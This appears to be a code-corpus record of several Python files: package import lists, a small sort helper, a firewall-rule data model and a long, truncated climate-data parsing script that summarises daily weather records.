0.799945
0.799945
0.784173
0.770891
0.738794
0
0.037682
0.217888
5,870
154
75
38.116883
0.74951
0.101874
0
0.719626
0
0
0.207533
0.081796
0
0
0
0
0.205607
1
0.084112
false
0
0.028037
0
0.121495
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9cc7aefd30ad4120cedbb83f445eb6ceb68e930c
173
py
Python
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
1
2021-11-18T02:28:17.000Z
2021-11-18T02:28:17.000Z
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
null
null
null
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
1
2021-05-30T14:26:45.000Z
2021-05-30T14:26:45.000Z
"""Move imports to module level for convenience""" from .nchain import * from .frozen_lake import * from .taxi import * from .mountain_car import * from .pendulum import *
21.625
50
0.745665
24
173
5.291667
0.666667
0.314961
0
0
0
0
0
0
0
0
0
0
0.16185
173
7
51
24.714286
0.875862
0.254335
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
141c285eb097db4e7c9df33763e803922a146d0f
81
py
Python
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
def example_sort(arr, example_arr): return sorted(arr, key=example_arr.index)
40.5
45
0.777778
13
81
4.615385
0.615385
0.333333
0
0
0
0
0
0
0
0
0
0
0.111111
81
2
45
40.5
0.833333
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
145999f4d386cd277a6aaef3a3a3bb67f18dc1cc
149
py
Python
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
from app.models.setting import BaseModel, Engine, session from app.models.arxiv_query import ArxivQueryModel from app.models.paper import PaperModel
37.25
57
0.852349
21
149
6
0.619048
0.166667
0.309524
0
0
0
0
0
0
0
0
0
0.09396
149
3
58
49.666667
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
145a3a50d99379e7770ecd5451d176e171d66f3b
219
py
Python
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
from attack_surface_pypy import types from attack_surface_pypy.models.v1.models import base, tag class FirewallRuleModel(base.BaseModel): fw_id: types.FW_ID source_tag: tag.TagModel dest_tag: tag.TagModel
24.333333
58
0.794521
33
219
5.030303
0.545455
0.120482
0.204819
0.253012
0
0
0
0
0
0
0
0.005319
0.141553
219
8
59
27.375
0.87766
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.333333
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
14679d1b215e6455f7d92d1f8834e5b65db4980d
26
py
Python
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
from .aocd_utils import *
13
25
0.769231
4
26
4.75
1
0
0
0
0
0
0
0
0
0
0
0
0.153846
26
1
26
26
0.863636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
1473d71c0d5609632a19e373ee5f67c3735385ad
578,867
py
Python
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
null
null
null
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
1
2021-07-28T20:09:34.000Z
2021-07-28T20:30:14.000Z
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
null
null
null
# v2.92 import datetime from time import time import calendar from statistics import mean, pstdev, mode, median, median_grouped from math import floor import csv import os from textwrap import wrap from string import Template import random import traceback # assisted on nested list comprehensions: https://www.geeksforgeeks.org/nested-list-comprehensions-in-python/ def quicklist(vrbl,**kw): if vrbl not in ["prcp","snow","snwd","tmax","tmin"]: return print("OOPS! Improper variable entered. Try again!") vdictionary = {"prcp":"Precipitation Totals","snow":"Snow Totals","snwd":"Snow Depths","tmax":"High Temperatures","tmin":"Low Temperatures"} if all(x in kw and len(list(kw.keys())) == 1 for x in ["season"]): # all yrs; specific season; all months & days #if type(kw["season"]) == list: #qwkli = [] #for s in kw["season"]: qwkli.extend(x for y in metclmt if type(y) == int for x in metclmt[y][s][vrbl]) #else: # If just one season passed qwkli = [x for y in metclmt if type(y) == int for x in metclmt[y][kw["season"]][vrbl]] print("* Completed list for all {} occurring in Meteorological {} from the entire record *".format(vdictionary[vrbl],kw["season"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["metyear"]): # specific metyear; all months & days try: qwkli = metclmt[kw["metyear"]][vrbl] print("* Completed list for all {} occurring in the Meteorological Year {}. Same as metclmt[{}]['{}'] *".format(vdictionary[vrbl],kw["metyear"],kw["metyear"],vrbl)) except: if kw["metyear"] not in metclmt: print("OOPS! No records are available for the Meteorological Year {}".format(kw["metyear"])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["metyear","season"]): # specific metyear; specific season; all months & days try: qwkli = metclmt[kw["metyear"]][kw["season"]][vrbl] print("* Completed list for all {} occurring in Meteorological {} of the Year {}. 
Same as metclmt[{}]['{}']['{}'] *".format(vdictionary[vrbl],kw["season"],kw["metyear"],kw["metyear"],kw["season"],vrbl)) except: if kw["metyear"] not in metclmt: print("OOPS! No records are available for {}".format(kw["year"])) elif kw["month"] not in metclmt[kw["metyear"]]: print("OOPS! No records are available for {} {}".format(calendar.month_name[kw["month"]],kw["metyear"])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["year","month"]): # specific year; specific month; all days try: qwkli = clmt[kw["year"]][kw["month"]][vrbl] print("* Completed list for all {} occurring in {} {}. Same as clmt[{}][{}]['{}'] *".format(vdictionary[vrbl], calendar.month_name[kw["month"]],kw["year"],kw["month"],kw["year"],vrbl)) except: if kw["year"] not in clmt: print("OOPS! No records are available for {}".format(kw["year"])) elif kw["month"] not in clmt[kw["year"]]: print("OOPS! No records are available for {} {}".format(calendar.month_name[kw["month"]],kw["year"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["year"]): # specific year; all months; all days try: qwkli = clmt[kw["year"]][vrbl] print("* Completed list for all {} occurring in {}. Same as clmt[{}]['{}'] *".format(vdictionary[vrbl],kw["year"],kw["year"],vrbl)) except: if kw["year"] not in clmt: print("OOPS! 
No records are available for {}".format(kw["year"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["month"]): # all years; specific month; all days qwkli = [x for y in clmt if type(y) == int for m in clmt[y] if type(m) == int and m in clmt[y] and m == kw["month"] for x in clmt[y][kw["month"]][vrbl]] print("* Completed list for all {} occurring in the month of {} for all years on record.".format(vdictionary[vrbl],calendar.month_name[kw["month"]])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["month","day"]): # all years; specific month; specific day if vrbl == "prcp": qwkli = [float(clmt[y][kw["month"]][kw["day"]].prcp) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].prcp not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].prcpQ in ignoreflags] elif vrbl == "snow": qwkli = [float(clmt[y][kw["month"]][kw["day"]].snow) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].snow not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].snowQ in ignoreflags] elif vrbl == "snwd": qwkli = [float(clmt[y][kw["month"]][kw["day"]].snwd) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].snwd not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].snwdQ in ignoreflags] elif vrbl == "tmax": qwkli = [int(clmt[y][kw["month"]][kw["day"]].tmax) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].tmax not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].tmaxQ in ignoreflags] elif vrbl == "tmin": qwkli = [int(clmt[y][kw["month"]][kw["day"]].tmin) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].tmin not in ["","-9999","9999"] 
and clmt[y][kw["month"]][kw["day"]].tminQ in ignoreflags] print("* Completed list for all {} occurring on {} {} for all years on record *".format(vdictionary[vrbl],calendar.month_name[kw["month"]],kw["day"])) return qwkli def percentiles(li): li.sort() # Sort list from smallest value to largest n = len(li) percentiles = [x for x in range(5,95+5,5)] # list of kth percentiles we'll be calculating for k in percentiles: i = k/100 * (n + 1) if i / 1 == int(i): # if 'i' is an integer... print("{}th Percentile: {}".format(k,li[int(i)-1])) else: i_down = int(i) i_up = int(i)+1 print("{}th Percentile: {:.1f}".format(k,mean([li[i_down-1],li[i_up-1]]))) def percentile(k,li): if k <= 0 or k >= 100: return print("OOPS! Invalid percentile. Try again") li.sort() # Sort list from smallest value to largest n = len(li) i = k/100 * (n + 1) if i / 1 == int(i): # if 'i' is an integer... print("{}th Percentile: {}".format(k,li[int(i)-1])) else: i_down = int(i) i_up = int(i)+1 print("{}th Percentile: {:.1f}".format(k,mean([li[i_down-1],li[i_up-1]]))) def revperc(v,li): if v < min(li) or v > max(li): return print("OOPS! Invalid value. 
Ensure to select one that is in the range of the data") li.sort() xli = sorted([x for x in li if x < v]) # Number of data < value x = len(xli) # " " " yli = [y for y in li if y == v] # Number of times value shows up in the passed list y = len(yli) # " " " n = len(li) # lenght of entire list k = round((x + 0.5*y)/n*100) print("{} is the {}th Percentile".format(v,k)) def stats(li): # Q1 ~ 25th percentile; Q2 ~ 50th percentile and median; Q3 ~ 75th percentile; # sort the list from smallest to largest # if len(li) of a quartile == 0, it is the mean of the 2 most-central points li.sort() # orders the values from smallest to largest # [52, 68, 73, 77, 82, 89, 91, 96] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 # [52, 68, 73, 75, 77, 82, 89, 91, 96, 97] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 8 9 # [52, 68, 73, 75, 77, 82, 91, 96, 97] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 8 # rli = sorted([random.randint(20,100) for x in range(20)]) # feb_tmax = [tmax for y in clmt if type(y) == int for m in clmt[y] if m in clmt[y] and m == 2 for tmax in clmt[y][m]["tmax"] if len(clmt[y][m]["tmax"]) > excludemonth] L1 = li[:-1 * int(len(li)/2)] L3 = li[-1 * int(len(li)/2):] if len(li) % 2 == 0 and len(li)/2 % 2 == 0: # indicates an even number in the set whose mean is also an even number Q1 = mean([L1[int(len(L1)/2)-1],L1[int(len(L1)/2)]]) Q2 = mean([li[int(len(li)/2)-1],li[int(len(li)/2)]]) Q3 = mean([L3[int(len(L1)/2)-1],L3[int(len(L1)/2)]]) else: if len(li) % 2 == 0: # indicates an even number in the set whose mean is an odd number Q2 = mean([li[int(len(li)/2)-1],li[int(len(li)/2)]]) Q3 = L3[int(len(L3)/2)] else: Q2 = li[int(len(li)/2)] # odd number of items in list Q3 = L3[int(len(L3)/2)-1] Q1 = L1[int(len(L1)/2)] IQR = Q3 - Q1 M = mean(li) PSDV = pstdev(li) colwidth = max(len(str(x)) for x in [Q1,Q2,Q3]) 
print("Stats") print("-----") print(" {:^{cwid}} {:^{cwid}} {:^{cwid}}".format("Q1","Q2","Q3",cwid=colwidth)) print(" {:-^{cwid}} {:-^{cwid}} {:-^{cwid}}".format("","","",cwid=colwidth)) print(" {:^{cwid}} {:^{cwid}} {:^{cwid}}".format(Q1,Q2,Q3,cwid=colwidth)) print("-----") print("Mean: {:.1f}".format(M),end="") print("; PSTDEV: +/- {:.1f}".format(PSDV)) print("1STDEV Range: [ {:.1f}, {:.1f} ]".format(M-PSDV,M+PSDV),end="") print("; Values w/in 1PSTDEV: {:.1f}%".format(len([x for x in li if x >= M-PSDV and x <= M+PSDV])/len(li)*100)) print("2STDEV Range: [ {:.1f}, {:.1f} ]".format(M-2*PSDV,M+2*PSDV),end="") print("; Values between 1 & 2PSTDEV: {:.1f}%".format((len([x for x in li if x >= M-2*PSDV and x <= M+2*PSDV])-len([x for x in li if x >= M-PSDV and x <= M+PSDV]))/len(li)*100)) #print("Values w/in range (Q1,Q3]: {:.1f}%".format(len([x for x in li if x <= Q3 and x > Q1])/len(li)*100)) print("IQR (Q3-Q1): {}".format(IQR),end="") print("; Range of Potential Outliers: < {}; > {}".format(Q1-1.5*IQR,Q3+1.5*IQR)) if min(li) < Q1-1.5*IQR or max(li) > Q3+1.5*IQR else print("; * No Outliers") print("Potential Outliers: QTY {}; {}".format(len([x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR]),[x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR])) if len([x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR]) > 0 else print("") def histogram(li): li.sort() li_set = sorted(list(set(li))) d = {} for x in li: if x not in d: d[x] = 1 else: d[x] += 1 max_rows = max(amt for amt in d) print("Temperature","Frequency",sep=",") for x in li_set: print("{}".format(x),"{}".format(d[x]),sep=",") class DayRecord: """Parses each line of date-specific data; not used by user""" # int(each[5][0:4])][int(each[5][5:7])][int(each[5][8:10]) def __init__(self,raw): self.stationid = raw[0] self.station_name = raw[1] self.station_lat = raw[2] self.station_lon = raw[3] self.station_elev = raw[4] ry = int(raw[5][0:4]) rm = int(raw[5][5:7]) rd = int(raw[5][8:10]) self.daystr = raw[5] self.entryday = 
datetime.date(ry,rm,rd) # PRCP - Precipitation self.prcp = raw[6] flags_prcp = raw[7].split(",") self.prcpM, self.prcpQ, self.prcpS, self.prcpT = attchk(flags_prcp) if self.prcpQ in ignoreflags and self.prcp not in ["9999","-9999",""] and float(self.prcp) > 0: if round(float(self.prcp),2) not in clmt_vars_days["prcp"]: clmt_vars_days["prcp"][round(float(self.prcp),2)] = [] clmt_vars_days["prcp"][round(float(self.prcp),2)].append(self.entryday) # SNOW - Snow self.snow = raw[8] flags_snow = raw[9].split(",") self.snowM, self.snowQ, self.snowS, self.snowT = attchk(flags_snow) if self.snowQ in ignoreflags and self.snow not in ["9999","-9999",""] and float(self.snow) > 0: if round(float(self.snow),1) not in clmt_vars_days["snow"]: clmt_vars_days["snow"][round(float(self.snow),1)] = [] clmt_vars_days["snow"][round(float(self.snow),1)].append(self.entryday) # SNWD - Snow Depth self.snwd = raw[10] flags_snwd = raw[11].split(",") self.snwdM, self.snwdQ, self.snwdS, self.snwdT = attchk(flags_snwd) if self.snwdQ in ignoreflags and self.snwd not in ["9999","-9999",""] and float(self.snwd) > 0: if round(float(self.snwd),1) not in clmt_vars_days["snwd"]: clmt_vars_days["snwd"][round(float(self.snwd),1)] = [] clmt_vars_days["snwd"][round(float(self.snwd),1)].append(self.entryday) # TMAX - Maximum Temperature self.tmax = raw[12] flags_tmax = raw[13].split(",") self.tmaxM, self.tmaxQ, self.tmaxS, self.tmaxT = attchk(flags_tmax) if self.tmaxQ in ignoreflags and self.tmax not in ["9999","-9999",""]: if int(self.tmax) not in clmt_vars_days["tmax"]: clmt_vars_days["tmax"][int(self.tmax)] = [] clmt_vars_days["tmax"][int(self.tmax)].append(self.entryday) # TMIN - Minimum Temperature self.tmin = raw[14] flags_tmin = raw[15].split(",") self.tminM, self.tminQ, self.tminS, self.tminT = attchk(flags_tmin) if self.tminQ in ignoreflags and self.tmin not in ["9999","-9999",""]: if int(self.tmin) not in clmt_vars_days["tmin"]: clmt_vars_days["tmin"][int(self.tmin)] = [] 
clmt_vars_days["tmin"][int(self.tmin)].append(self.entryday) # TAVG - Daily Average Temperature if self.tmaxQ in ignoreflags and self.tmax not in ["9999","-9999",""] and self.tminQ in ignoreflags and self.tmin not in ["9999","-9999",""]: tempavg = round(mean([int(self.tmax),int(self.tmin)]),1) if tempavg not in clmt_vars_days["tavg"]: clmt_vars_days["tavg"][tempavg] = [] clmt_vars_days["tavg"][tempavg].append(self.entryday) def clmtAnalyze(filename,**CITY): """Initializes the build of city & session-specific climate dictionaries; Required for the successful use of the script. clmtAnalzye(filename, **{city=str}) REQUIRED: filename --> str version of the filename (a csv) of interest. OPT **kwargs: city=str --> Dictates output of the city-name. This is useful if multiple stations are compiled together to represent the data as it wouldn't be recommended to use a singular station's name if it isn't a complete representation of the data. """ if os.path.isfile(filename) == False: return print('"{}" not found! Try again!'.format(filename)) global clmt global metclmt global FILE global clmt_vars_days global clmt_vars_months global station_ids FILE = filename clmt = {} metclmt = {} clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}} clmt_vars_months = {"prcp":{},"prcpDAYS":{},"snow":{},"snowDAYS":{},"snwd":{},"snwdDAYS":{},"tavg":{},"tmax":{},"tmin":{}} station_ids = [] START = time() print("*** Script Running. 
Please Wait ***") def statbuild(y,m,d): # Will run through if clmt[y][m][d] doesn't exist # YEAR and MONTH - Additional keys if "recordqty" not in clmt[y]: clmt[y]["recordqty"] = 1 else: clmt[y]["recordqty"] += 1 if "recordqty" not in clmt[y][m]: clmt[y][m]["recordqty"] = 1 else: clmt[y][m]["recordqty"] += 1 if "prcp" not in clmt[y]: clmt[y]["prcp"] = [] clmt[y]["prcpDAYS"] = 0 clmt[y]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} if "prcp" not in clmt[y][m]: clmt[y][m]["prcp"] = [] clmt[y][m]["prcpDAYS"] = 0 clmt[y][m]["prcpPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: if float(clmt[y][m][d].prcp) > 0: clmt[y]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y]["prcpPROP"]["day_max"][1] = [] clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y][m]["prcpPROP"]["day_max"][1] = [] clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": clmt[y]["prcpDAYS"] += 1 clmt[y][m]["prcpDAYS"] += 1 if "snow" not in clmt[y]: clmt[y]["snow"] = [] clmt[y]["snowDAYS"] = 0 clmt[y]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} if "snow" not in clmt[y][m]: clmt[y][m]["snow"] = [] clmt[y][m]["snowDAYS"] = 0 clmt[y][m]["snowPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].snowQ in ignoreflags and 
clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: clmt[y]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y]["snowPROP"]["day_max"][1] = [] clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y][m]["snowPROP"]["day_max"][1] = [] clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": clmt[y]["snowDAYS"] += 1 clmt[y][m]["snowDAYS"] += 1 if "snwd" not in clmt[y]: clmt[y]["snwd"] = [] clmt[y]["snwdDAYS"] = 0 clmt[y]["snwdPROP"] = {"day_max":[-1,[]]} if "snwd" not in clmt[y][m]: clmt[y][m]["snwd"] = [] clmt[y][m]["snwdDAYS"] = 0 clmt[y][m]["snwdPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: clmt[y]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y]["snwdPROP"]["day_max"][1] = [] clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y][m]["snwdPROP"]["day_max"][0]: 
clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y][m]["snwdPROP"]["day_max"][1] = [] clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": clmt[y]["snwdDAYS"] += 1 clmt[y][m]["snwdDAYS"] += 1 if "tmax" not in clmt[y]: clmt[y]["tempAVGlist"] = [] clmt[y]["tmax"] = [] clmt[y]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if "tmax" not in clmt[y][m]: clmt[y][m]["tempAVGlist"] = [] clmt[y][m]["tmax"] = [] clmt[y][m]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]]} if "tmin" not in clmt[y]: clmt[y]["tmin"] = [] clmt[y]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if "tmin" not in clmt[y][m]: clmt[y][m]["tmin"] = [] clmt[y][m]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]]} if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if (clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin)) or clmt[y][m][d].tmin == "": clmt[y]["tmax"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_max"][1] = [] clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_min"][1] = [] 
clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_max"][1] = [] clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_min"][1] = [] clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if (clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax)) or clmt[y][m][d].tmax == "": clmt[y]["tmin"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_max"][1] = [] clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_min"][1] = [] clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][0] = 
